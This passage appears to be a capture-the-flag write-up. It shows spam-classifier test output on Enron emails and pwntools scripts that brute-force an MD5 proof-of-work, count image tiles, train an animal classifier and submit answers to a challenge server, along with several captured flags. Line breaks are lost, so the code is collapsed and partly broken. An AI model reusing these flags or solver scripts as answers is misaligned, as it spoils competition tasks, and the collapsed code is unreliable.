makingrnarrangements forrnthe evening at the enron field . hopefully , we shall be able to combinerndinner with a game .rnvincern" dennis w . loughridge " on 04 / 30 / 2001 10 : 49 : 10 amrnplease respond tornto :rncc :rnsubject : re : alp presentationrnvincerni will be attending the alp presentation on may 7 and would be pleased tornjoin the team for dinner if it is not too late .rnthank yourndennis loughridgerndennis w . loughridgerndirector of energy consortiumrnrice universityrn713 - 348 - 2812rn- - - - - original message - - - - -rnfrom : vince . j . kaminski @ enron . com [ mailto : vince . j . kaminski @ enron . com ]rnsent : tuesday , april 10 , 2001 8 : 16 amrnto : loughrid @ rice . edurncc : luigical @ rice . edurnsubject : alp presentationrnsorry , trying again . i probably got a wrong e - mail address and the originalrnmessagernwas returned .rnvince kaminskirn- - - - - - - - - - - - - - - - - - - - - - forwarded by vince j kaminski / hou / ect on 04 / 10 / 2001rn08 : 15 am - - - - - - - - - - - - - - - - - - - - - - - - - - -rnvince j kaminskirn04 / 10 / 2001 08 : 13 amrnto : barrett @ rice . edu , uecker @ rice . edu , cmiller @ rice . edu ,rnlounghrid @ rice . edu , luigical @ rice . edurncc : vince j kaminski / hou / ect @ ect , christie patrick / hou / ect @ ect , shirleyrncrenshaw / hou / ect @ ect , kenneth parkhill / na / enron @ enronrnsubject : alp presentationrnon behalf of enron corp . i would like to invite you to an alp projectrnpresentation by a group of studentsrnof jesse h . jones graduate school of management , rice university .rnthe students will present the results of a research project regardingrnelectronic tradingrnplatforms in the energy industry .rnthe presentation will be held on may 7 , at 4 : 00 p . m . at enron , 1400 smith .rnwe would also like to invite you to dinner , following the presentation .rnvince kaminskirnvincent kaminskirnmanaging director - researchrnenron corp .rn1400 smith streetrnroom ebl 962rnhouston , tx 77002 - 7361rnphone : ( 713 ) 853 3848rn( 713 ) 410 5396 ( cell )rnfax : ( 713 ) 646 2503rne - mail : vkamins @ enron . com'The category is (H for ham/S for spam): H################################################################################Testing data 8/10--------------------------------------------------------------------------------b"Subject: would you like a $ 250 check ?rnwe ' re receiving checks for $ 100 ' s and $ 1 , 000 ' srnevery month - let me show you how you can easilyrndo the exact same thing !rnyou are receiving this emailrnas a subscriber to the dealsuwant mailing list . to remove yourselfrnfrom this and related email lists click here :rnunsubscribe my emailrnunder bill ( s ) 1618 title iii by the 105 us congress , per sectionrn301 , paragraph ( a ) ( 2 ) of s . 1618 , a letter cannot be consideyellowrnspam if the sender includes contact information and a methodrnof removal .rn"The category is (H for ham/S for spam): S################################################################################Testing data 9/10--------------------------------------------------------------------------------b"Subject: fwd : need meds xanaix | = v @ 1 | um ' vl @ gra pnter : m : in _ somia | hoosornwe believe ordering medication should be as simple as ordering anything else on the internet : private , secure , and easy .rnwe have : ` som : a : # pntermin . vl @ gra = / v / alium _ xana _ x _ - ativ ` @ nrnplus : p : @ xil , busp @ : r , a ` dipex , ionam | * n , m 3 rid ` ia , x 3 nic . a | , ambi 3 ' n , s : 0 nata , fl 3 x . eril , ce | : 3 brex , f ' ioric 3 t , tram : @ do | , uitr @ ` m , l 3 . vitra , prop . 3 cia , ac . yc | 0 vir , pr ` 0 z @ crnwe offer you a choice of original and generic medications .rnenjoy deep discount meds here .rn"The category is (H for ham/S for spam): S################################################################################Testing data 10/10--------------------------------------------------------------------------------b'Subject: get your college degree online !rn'The category is (H for ham/S for spam): S################################################################################
        Good job! Just take it:        flag{3acf10d4ed12d34ed63e62ec225c077f}
Press ENTER to continue... %                                                    (base) 0HB@Caliburn ~ %

pythonfrom PIL import Image, ImageDraw, ImageFont, ImageFilter

size = 20imgs = []png = Image.open('/Users/0HB/Desktop/分析/test.png')pngs = []
for y in range(size):    for x in range(size):        tmp = png.crop((x * 50, y * 50, (x+1)*50, (y+1) * 50))        if tmp not in pngs:  # 去重            pngs.append(tmp)
assert len(pngs) == 26for i in range(len(pngs)):    pngs[i].save(f'/Users/0HB/Desktop/分析/seeds/{i}.png')

python#!/usr/bin/env python3# -*- coding: utf-8 -*-from string import digitsfrom pwn import *from itertools import productimport base64, hashlibfrom PIL import Image
table = 'abcdef' + digits

class Solve():    def __init__(self):        # nc 47.97.127.1 24929        self.sh = remote('47.97.127.1', 24929)
    def proof_of_work(self):        GeShi = b"What's is plaintext?"        proof = self.sh.recvuntil(GeShi).decode().split('sha256')[-1].split("What's is plaintext?")[0]        print(proof)        Xnum = 6        tail = proof.split('plaintext: ')[-1].split('??????')[0].strip()        _hash = proof.split('-> ')[-1].strip()        if 'n' in _hash:            _hash = _hash.split('n')[0]        print("未知数：", Xnum)        print(tail)        print(_hash)        print('开始爆破！')        for i in product(table, repeat=Xnum):            head = ''.join(i)            # print(head)            t = hashlib.md5((tail+head).encode()).hexdigest()            if t == _hash:                print('爆破成功！结果是：', end='')                print(tail+head)                self.sh.sendline((tail+head).encode())                break
    def fxxk(self):        size = 20        seed = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'        result = [0 for _ in range(26)]        ans = []
        for i in seed:            path = f'/Users/0HB/Desktop/分析/seeds/{i}.png'            ans.append(Image.open(path).resize((50, 50), Image.ANTIALIAS))  # .resize((50, 50), Image.ANTIALIAS) 很关键
        png = Image.open('/Users/0HB/Desktop/分析/flag.png')        for y in range(size):            for x in range(size):                tmp1 = png.crop((x * 50, y * 50, (x + 1) * 50, (y + 1) * 50))                c = ans.index(tmp1)                result[c] += 1        return result
    def solve(self):        self.proof_of_work()        self.sh.recvuntil(b'now, you get a png:')        tmp = self.sh.recvuntil(b'##The end, please tell me your list:').split(b'##The end, please tell me your list:')[0]        tmp = tmp.strip()        img_data = base64.b64decode(tmp)        with open('/Users/0HB/Desktop/分析/flag.png', 'wb') as f:            f.write(img_data)        print('图片已生成！')        self.sh.recvuntil(b'> ')        result = str(self.fxxk())[1:-1].replace(' ', '').encode()        print(result)        self.sh.sendline(result)        print(self.sh.recvline())        print(self.sh.recvline())        # flag{cedf7a5c55e775f73080357b358af0ac}

if __name__ == '__main__':    solution = Solve()    solution.solve()

pythonnn.Sequential(OrderedDict([                          ('dropout1', nn.Dropout(0.1)),                          ('fc1', nn.Linear(1000, ins.hiddenunits)),                           ('relu1', nn.ReLU()),                          ('dropout2', nn.Dropout(0.1)),                          ('fc2', nn.Linear(ins.hiddenunits, 14)),                          ('output', nn.LogSoftmax(dim=1))                          ]))

bashmkdir work_dirs animal_train animal_val

pythonimport osimport shutilimport tempfilefrom PIL import Imageimport numpy as npimport cv2from sklearn.metrics import classification_reportimport torchfrom torchvision import datasets, transforms, models
# Read image filenames from the dataset folders
data_dir = './animal'class_names0 = os.listdir(data_dir)
class_names=[]for item in class_names0:    class_names+=[item]num_class = len(class_names)image_files = [[os.path.join(data_dir, class_name, x)                for x in os.listdir(os.path.join(data_dir, class_name))]                for class_name in class_names]print(image_files)
image_file_list = []image_label_list = []for i, class_name in enumerate(class_names):    image_file_list.extend(image_files[i])    image_label_list.extend([i] * len(image_files[i]))num_total = len(image_label_list)print(image_file_list)
image_width, image_height = Image.open(image_file_list[0]).size
print("Total image count:", num_total)print("Image dimensions:", image_width, "x", image_height)print("Label names:", class_names)print("Label counts:", [len(image_files[i]) for i in range(num_class)])
def process_image(image):    ''' Scales, crops, and normalizes a PIL image for a PyTorch model,        returns an Numpy array    '''    # TODO: Process a PIL image for use in a PyTorch model    # Resize the images where the shortest side is 256 pixels, keeping the aspect ratio    pil_image = Image.open(image)    width, height = pil_image.size    aspect_ratio = width / height    if aspect_ratio > 1:        pil_image = pil_image.resize((round(aspect_ratio * 256), 256))    else:        pil_image = pil_image.resize((256, round(256 / aspect_ratio)))            # Crop out the center 224x224 portion of the image    width, height = pil_image.size    new_width = 224    new_height = 224    left = (width - new_width)/2    top = (height - new_height)/2    right = (width + new_width)/2    bottom = (height + new_height)/2    pil_image = pil_image.crop((round(left), round(top), round(right), round(bottom)))        return pil_image
# Prepare training, validation, and test data listsvalid_frac = 0.2trainX, trainY = [], []valX, valY = [], []testX, testY = [], []
for i in range(num_total):    trainX.append(image_file_list[i])    trainY.append(image_label_list[i])    j = image_file_list[i]    k = j.split('/')[-2]    r = j.split('/')[-1]    os.makedirs(f'./animal_train/{k}', exist_ok=True)    process_image(j).save(os.path.join(f'./animal_train/{k}/', r))        valX.append(image_file_list[i])    valY.append(image_label_list[i])    j = image_file_list[i]    k = j.split('/')[-2]    r = j.split('/')[-1]    os.makedirs(f'./animal_val/{k}', exist_ok=True)    process_image(j).save(os.path.join(f'./animal_val/{k}/', r))        print(len(trainX), len(valX))print(trainX)
train_dir = './animal_train'val_dir = './animal_val'batch_size = 5
transform = transforms.Compose(    [transforms.ToTensor(),     transforms.RandomVerticalFlip(p=0.5),     transforms.RandomRotation(30, center=(0, 0), expand=True),     transforms.ColorJitter(contrast=0.5),     transforms.ColorJitter(saturation=0.5),     transforms.RandomAffine(degrees=0, shear=(0, 0, 0, 30)),     transforms.Resize((224, 224)),     transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])])


image_datasets = {}image_datasets["train"] = datasets.ImageFolder(root = train_dir, transform=transform)image_datasets["valid"] = datasets.ImageFolder(root = val_dir, transform=transform)
dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']}class_names = image_datasets['train'].classes
print(class_names)
train_loader = torch.utils.data.DataLoader(image_datasets["train"], batch_size=batch_size, shuffle = True,                                          num_workers = 2)valid_loader = torch.utils.data.DataLoader(image_datasets["valid"], batch_size=batch_size, shuffle = False,                                          num_workers = 2)
print(dataset_sizes)device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")print(device)
import argparse
# TODO: Build and train your networkdef prep_model(arch):    model_select = models.resnet18(pretrained=True)    return model_select
parser = argparse.ArgumentParser()
g = None
parser.add_argument('-save_dir', action="store", dest="save_dir", type=str, default="./work_dirs")parser.add_argument('-arch', action="store", dest="arch", type=str, default="resnet18")parser.add_argument('-learningrate', action="store", dest="learningrate", type=float, default=1e-3)parser.add_argument('-hiddenunits', action="store", dest="hiddenunits", type=int, default=128)parser.add_argument('-epochs', action="store", dest="epochs", type=int, default=32)parser.add_argument('-gpu', action=g, default=None)ins=parser.parse_args(args=[])
model_select = prep_model(ins.arch)
from collections import OrderedDictimport torch.nn as nn
class Model(nn.Module):    def __init__(self):        super().__init__()        self.model_select = model_select    # Replace model's old classifier with the new classifier        self.classifier = nn.Sequential(OrderedDict([                          ('dropout1', nn.Dropout(0.1)),                          ('fc1', nn.Linear(1000, ins.hiddenunits)),                           ('relu1', nn.ReLU()),                          ('dropout2', nn.Dropout(0.1)),                          ('fc2', nn.Linear(ins.hiddenunits, 14)),                          ('output', nn.LogSoftmax(dim=1))                          ]))        def forward(self,inputs):        output = model_select(inputs)        output = self.classifier(output)        return output        model = Model()
import torch, gcgc.collect()torch.cuda.empty_cache()
use_gpu = torch.cuda.is_available()print(use_gpu)
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.classifier.parameters(), lr = ins.learningrate)
model.cuda()
from torch.autograd import Variable
train_loss=[]test_loss=[]train_accuracy=[]test_accuracy=[]best_acc = 0# Trainingfor epoch in range(ins.epochs):    # Reset variables at 0 epoch    correct=0    iteration=0    iter_loss=0.0      model.train() # Training Mode      for i,(inputs,label) in enumerate(train_loader):        labels = torch.zeros((batch_size,14))        item = list(range(batch_size))        for m in item:            labels[m][label[m]]=1                inputs=Variable(inputs)        labels=Variable(labels)        CUDA=torch.cuda.is_available()        if CUDA:            inputs=inputs.cuda()            labels=labels.cuda()        optimizer.zero_grad() # clear gradient        outputs=model(inputs)        loss=criterion(outputs,labels)        iter_loss += loss.item() # Accumulate loss        loss.requires_grad_(True)        loss.backward() # backpropagation        optimizer.step() # update weights
        # Save the correct predictions for training data        _,predicted=torch.max(outputs,1)        correct +=(predicted.cpu()==label.cpu()).sum()        iteration +=1        train_loss.append(iter_loss/iteration)    train_accuracy.append((100*correct/len(image_datasets["train"])))      # Testing    correct=0    iteration=0    valid_loss=0.0      model.eval()  # Testing Mode      for i, (inputs, label) in enumerate(valid_loader):        labels = torch.zeros((batch_size,14))        item = list(range(batch_size))        for m in item:            labels[m][label[m]]=1
        inputs=Variable(inputs)        labels=Variable(labels)
        CUDA=torch.cuda.is_available()        if CUDA:            inputs=inputs.cuda()            labels=labels.cuda()        with torch.no_grad():            outputs=model(inputs)            loss=criterion(outputs,labels)            valid_loss += loss.item()
            _,predicted=torch.max(outputs,1)            correct+=(predicted.cpu()==label.cpu()).sum()
            iteration+=1          test_loss.append(valid_loss/iteration)    test_accuracy.append((100*correct/len(image_datasets["valid"])))       print('Epoch {}/{}, Training Loss:{:.3f}, Training Accuracy:{:.3f}, Testing Loss {:.3f}, Testing Accuracy:{:.3f}'       .format(epoch+1, ins.epochs, train_loss[-1], train_accuracy[-1], test_loss[-1], test_accuracy[-1]))    if (epoch + 1) % 4 == 0 :        state_dict = model.module.state_dict() if next(model.parameters()).device == 'cuda:0' else model.state_dict()        torch.save({'epoch': epoch, 'model_state_dict': state_dict},                f'./{ins.save_dir}/model_epoch_{epoch+1}.bin')

pythonimport osimport shutilimport tempfilefrom PIL import Imageimport numpy as npimport cv2from sklearn.metrics import classification_reportimport torchfrom torchvision import datasets, transforms, models
data_dir = './animal'class_names0 = os.listdir(data_dir)
class_names=[]for item in class_names0:    class_names+=[item]num_class = len(class_names)
import argparse
def prep_model(arch):    model_select = models.resnet18(pretrained=True)    return model_selectparser = argparse.ArgumentParser()
g = None
parser.add_argument('-save_dir', action="store", dest="save_dir", type=str, default="./work_dirs")parser.add_argument('-arch', action="store", dest="arch", type=str, default="resnet18")parser.add_argument('-learningrate', action="store", dest="learningrate", type=float, default=1e-3)parser.add_argument('-hiddenunits', action="store", dest="hiddenunits", type=int, default=128)parser.add_argument('-epochs', action="store", dest="epochs", type=int, default=32)parser.add_argument('-gpu', action=g, default=None)ins=parser.parse_args(args=[])
model_select = prep_model(ins.arch)
from collections import OrderedDictimport torch.nn as nn
class Model(nn.Module):    def __init__(self):        super().__init__()        self.model_select = model_select        self.model_select.classifier = nn.Sequential(OrderedDict([                          ('dropout1', nn.Dropout(0.1)),                          ('fc1', nn.Linear(1000, ins.hiddenunits)),                           ('relu1', nn.ReLU()),                          ('dropout2', nn.Dropout(0.1)),                          ('fc2', nn.Linear(ins.hiddenunits, 14)),                          ('output', nn.LogSoftmax(dim=1))                          ]))        def forward(self,inputs):        output = model_select(inputs)        output = self.classifier(output)        return output
model = Model()
import torch, gcgc.collect()torch.cuda.empty_cache()
def load_checkpoint(filepath):    checkpoint = torch.load(filepath)    model_select = checkpoint["model_select"]    model_select.classifier = checkpoint['classifier']    model_select.load_state_dict(checkpoint['state_dict'])    model_select.class_to_idx = checkpoint['class_to_idx']    optimizer = checkpoint['optimizer']    epochs = checkpoint['epochs']        for param in model_select.parameters():        param.requires_grad = False            return model_select, checkpoint['class_to_idx']
model = Model()checkpoint = torch.load("./work_dirs/model_epoch_32.bin", map_location='cpu')model.load_state_dict(checkpoint['model_state_dict'], strict=False)if torch.cuda.is_available():    model = model.cuda()model.eval()
def process_image2(image):    preprocess1 = transforms.Compose([        transforms.Resize(224),        transforms.CenterCrop(224)    ])        preprocess2 = transforms.Compose([        transforms.ToTensor(),        transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])    ])        image = preprocess1(image)      image = preprocess2(image)        return image
import torch.nn.functional as F
def predict(img, model, topk=5):    img = process_image2(img)    img = np.expand_dims(img, axis=0)    img = torch.from_numpy(img)    inputs = Variable(img).to("cuda")    outputs = model(inputs)    _,predicted=torch.max(outputs,1)    return predicted
from torch.autograd import Variablefrom pwn import *import hashlibimport io
li = lambda x : print('x1b[01;38;5;214m' + x + 'x1b[0m')ll = lambda x : print('x1b[01;38;5;1m' + x + 'x1b[0m')
r = remote('47.97.127.1', 29846)
def crack(part, c, level = 6):    s = int(part, 16) << (level * 4)    _limit = s + (1 << level * 4)    while s <= _limit:        s += 1        seed = hex(s)[2:].encode()        if hashlib.md5(seed).hexdigest() == c:            print(seed)            r.sendlineafter("What's is plaintext?n> ", seed)            return seed
r.recvuntil('plaintext: ')
pla = r.recv(26)print(str(pla))
r.recvuntil('md5_hex -> ')md5_hex = r.recv(32)print(md5_hex)crack(str(pla, encoding = "utf-8"), str(md5_hex, encoding = "utf-8"))r.recvline()for item in list(range(10)):    r.recvline()    image = r.recvline()[:-1]    li(str(image, encoding = 'utf-8'))    img = base64.b64decode(image)    img = Image.open(io.BytesIO(img))    predicted = predict(img, model)    print(class_names[predicted])    r.sendlineafter('>', class_names[predicted])r.interactive()

pythonbase64_charset = ''.join(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',                'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',                'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7',                '8', '9', '+', '/', '='])def decode(base64_str):
    base64_bytes = ['{:0>6}'.format(str(bin(base64_charset.index(s))).replace('0b', '')) for s in base64_str if                    s != '=']    resp = bytearray()    nums = len(base64_bytes) // 4    remain = len(base64_bytes) % 4    integral_part = base64_bytes[0:4 * nums]
    while integral_part:
        tmp_unit = ''.join(integral_part[0:4])        tmp_unit = [int(tmp_unit[x: x + 8], 2) for x in [0, 8, 16]]        for i in tmp_unit:            resp.append(i)        integral_part = integral_part[4:]    if remain:        remain_part = ''.join(base64_bytes[nums * 4:])        tmp_unit = [int(remain_part[i * 8:(i + 1) * 8], 2) for i in range(remain - 1)]        for i in tmp_unit:            resp.append(i)    return bytes(resp)
def check(x):    return x>=32 and x<=126
def pt(msg,mode):    data = decode(msg)    line = len(data)//16    if(len(data) % 16):        line+=1    for i in range(line):        if(mode == 1):            print(" "*8,end='')        print(hex(i*0x10)[2:].rjust(8,'0'),end='  ')        tmp = data[16*i:16*i+16]        tmp1 = " ".join([hex(j)[2:].rjust(2,"0") for j in tmp])+"   "        tmp2 = "".join(chr(j) if check(j) else "." for j in tmp)        tmp1 = tmp1[:23]+" "+tmp1[23:]        tmp2 = tmp2[:8]+" "+tmp2[8:]        #print(len(tmp1))        tmp1 = tmp1.ljust(51," ")        tmp2 = tmp2.ljust(17," ")        print(tmp1+tmp2)    N = int(input())cin = []for i in range(N):    mode,msg = input().split()    cin.append((mode,msg))for i in cin:    pt(i[1],int(i[0]))

pythonimport osimport sysimport requests
host,port = '47.97.127.1',10101base_url = f'http://{host}:{port}'token_url = f'{base_url}/getToken'judge_url = f'{base_url}/judge'
def getToken():    result = requests.post(token_url).json()    # print(result)    assert not result['error'], "System error"    return result['data']['token']
def judge(chall:str, src:str, language:str = 'PYTHON'):    data = {        'src': src,        'language': language,        'action': chall,        'token': token,    }    result = requests.post(judge_url, json = data).json()    print(result)    return True
token = getToken()print(token)py_src = open('exp.py').read()judge('chall1', py_src, 'PYTHON')# error 


# output ===========# # d88ec5bf78a36ab51d01c8da85457c40f1e4fb722704fdd216596edc71f35846# {'data': 'SUCCESS', 'error': None, 'flag': 'This_is_only_for_test'}# {'data': 'SUCCESS', 'error': None, 'flag': 'This_is_only_for_test'}# {'data': 'WRONG_ANSWER', 'error': 'JudgerError'}